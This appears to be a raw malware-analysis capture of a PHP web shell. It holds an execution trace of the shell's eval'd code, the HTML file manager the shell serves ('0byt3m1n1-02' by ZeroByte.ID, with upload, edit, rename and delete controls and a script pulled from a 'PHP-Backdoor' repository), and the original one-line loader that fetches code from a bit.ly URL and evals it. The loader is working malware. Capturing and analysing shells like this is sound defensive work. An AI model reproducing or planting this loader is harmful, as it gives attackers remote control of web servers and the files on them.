3	52	0	0.203111	468296	filesize	0		/var/www/html/uploads/oh.php(1) : eval()'d code	181	1	'/var/www/html/uploads/prepend.php'
3	52	1	0.203125	468336
3	52	R			57
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	181	$size = 0.0556640625
3	53	0	0.203149	468200	round	0		/var/www/html/uploads/oh.php(1) : eval()'d code	182	2	0.0556640625	3
3	53	1	0.203162	468272
3	53	R			0.056
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	182	$size = 0.056
2		A						/var/www/html/uploads/oh.php(1) : eval()'d code	186	$size = '0.056 KB'
3	54	0	0.203197	468304	is_writable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	189	1	'/var/www/html/uploads/prepend.php'
3	54	1	0.203213	468344
3	54	R			FALSE
3	55	0	0.203226	468304	is_readable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	191	1	'/var/www/html/uploads/prepend.php'
3	55	1	0.203242	468344
3	55	R			TRUE
3	56	0	0.203254	468304	perms	1		/var/www/html/uploads/oh.php(1) : eval()'d code	193	1	'/var/www/html/uploads/prepend.php'
4	57	0	0.203267	468304	fileperms	0		/var/www/html/uploads/oh.php(1) : eval()'d code	203	1	'/var/www/html/uploads/prepend.php'
4	57	1	0.203281	468344
4	57	R			33261
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	203	$perms = 33261
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	209	$info = '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	221	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	222	$info .= 'w'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	223	$info .= 'x'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	224	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	225	$info .= '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	226	$info .= 'x'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	227	$info .= 'r'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	228	$info .= '-'
3		A						/var/www/html/uploads/oh.php(1) : eval()'d code	229	$info .= 'x'
3	56	1	0.203401	468344
3	56	R			'-rwxr-xr-x'
3	58	0	0.203415	468304	is_writable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	194	1	'/var/www/html/uploads/prepend.php'
3	58	1	0.203431	468344
3	58	R			FALSE
3	59	0	0.203443	468304	is_readable	0		/var/www/html/uploads/oh.php(1) : eval()'d code	194	1	'/var/www/html/uploads/prepend.php'
3	59	1	0.203458	468344
3	59	R			TRUE
3	60	0	0.203471	468304	filemtime	0		/var/www/html/uploads/oh.php(1) : eval()'d code	196	1	'/var/www/html/uploads/prepend.php'
3	60	1	0.203485	468344
3	60	R			1676251797
3	61	0	0.203497	468240	date	0		/var/www/html/uploads/oh.php(1) : eval()'d code	196	2	'd-M-Y H:i'	1676251797
3	61	1	0.203527	468568
3	61	R			'12-Feb-2023 20:29'
2	5	1	0.203544	468240
2	5	R			NULL
1	3	1	0.203561	426088
			0.203588	343712
TRACE END   [2023-02-12 23:30:23.835696]


Generated HTML code

<html><head>
    <style>
    @import url(https://fonts.googleapis.com/css2?family=Balsamiq+Sans:ital@1&display=swap);
     body {
    background: url(https://i.imgur.com/J5cDUtx.png) no-repeat center center fixed; 
    background-size: cover;
    color:white;
    font-family: "Balsamiq Sans", cursive;
    margin:0;
    font-size: 14px; 
     } 
     h1 {
    font-family:"Balsamiq Sans", cursive;
    font-size:50px;
    margin:0; 
    color:#FF1493;
     } 
     h1:hover { 
    color:#FF69B4;
     } 
     select { 
    background:white;
    color:black; 
    }
     a { 
    color:#FF1493;
    text-decoration:none;
    font-family:"Balsamiq Sans", cursive; 
     } 
     textarea { 
    width:700px;
    height:300px;
    background:#FFB6C1;
    border:2px solid black;
    color:black;
    padding:5px;
     } 
     tr:hover { 
        background: #FFC0CB; } 
     th { 
        background:transparent;
        padding:3px; }
    </style>
    <meta name="robots" content"noindex.="" nofollow"="">
    <link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
    <title>0byt3m1n1-02</title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    </head>
    <body><div style="color:#ef6c00;margin-top:0;"><h1><center>0byt3m1n1-02</center></h1></div><iframe width="100%" height="20" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/464036103&amp;color=%23ff1493&amp;auto_play=false&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true"></iframe><hr color="FF1493" style="margin-top:0;width:99%"><table width="100%" border="0" align="center" style="margin-top:0px;"><tbody><tr><td><font color="#FF1493" style="font-size:14px;">Theme By xRyukZ.<br><font style="font-size:14px;">Path: <a style="font-size:14px;" href="?path="></a>/<a style="font-size:14px;" href="?path=/var">var</a>/<a style="font-size:14px;" href="?path=/var/www">www</a>/<a style="font-size:14px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Home</a> ]</font></font></td><td align="center" width="30%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:white;margin-bottom:10px;"><input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"><hr color="FF1493" style="margin-top:0;width:99%;"></td></tr></tbody></table><br><center></center><div id="content"><table width="80%" border="0" cellpadding="4" cellspacing="2" align="center"><tbody><tr class="first"> <th><center>Name</center></th><th width="10%"><center>Size</center></th><th width="20%"><center>Permissions</center></th> <th width="20%"><center>Last Update</center></th><th width="11%"><center>Actions</center></th></tr><tr><td>[F] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&amp;path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 20:29</center></td><td><center><form method="POST" action="?option&amp;path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option 
value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis"><input type="submit" value=">"></form></center></td></tr><tr><td>[F] <a href="?filesrc=/var/www/html/oh.php&amp;path=/var/www/html">oh.php</a></td><td><center>0.06 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 20:29</center></td><td><center><form method="POST" action="?option&amp;path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="oh.php"><input type="hidden" name="path" value="/var/www/html/oh.php"><input type="submit" value=">"></form></center></td></tr></tbody></table></div><br><center>© <span id="footer"><a href="http://zerobyte.id/">ZeroByte.ID</a></span> 2020.</center><br><script type="text/javascript" src="//zerobyte-id.github.io/PHP-Backdoor/inc/footer.js"></script></body></html>

Original PHP code

<?=eval("?>".file_get_contents("https://bit.ly/3jhOwIp"));?>